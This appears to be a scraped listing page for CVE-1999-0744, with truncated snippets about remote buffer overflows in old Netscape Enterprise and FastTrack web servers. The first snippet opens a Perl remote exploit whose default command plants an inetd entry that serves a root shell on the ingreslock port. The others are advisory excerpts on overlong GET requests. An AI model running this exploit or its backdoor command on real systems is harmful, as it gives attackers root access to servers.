CVE-1999-0744

#!/usr/bin/perl # # Remote sploit for Netscape Enterprise Server 40/sparc/SunOS 57 # usage: ns-shtmlpl ['command line'] | nc victim port # # Sometimes server may hang or coredump eek ;-) # fyodor@relaygroupcom $cmdline="echo 'ingreslock stream tcp nowait root /bin/sh sh -i' > /tmp/bob; /usr/sbin/inetd -s /tmp/bob"; $cmdline=$ARGV[0] if $ ...

source: wwwsecurityfocuscom/bid/908/info The version of Netscape FastTrack server that ships with UnixWare 71 is vulnerable to a remote buffer overlow By default, the httpd listens on port 457 of the UnixWare host and serves documentation via http If you pass the server a GET request with more than 367 characters, the stack overflows a ...

source: wwwsecurityfocuscom/bid/1024/info A GET request containing over 4080 characters will cause the httpdexe process to crash within Netscape Enterprise Server 36, resulting in a Dr Watson error Arbitrary code can be executed remotely at this point Netscape Enterprise Server 35 running on either Netware or Solaris is not known ...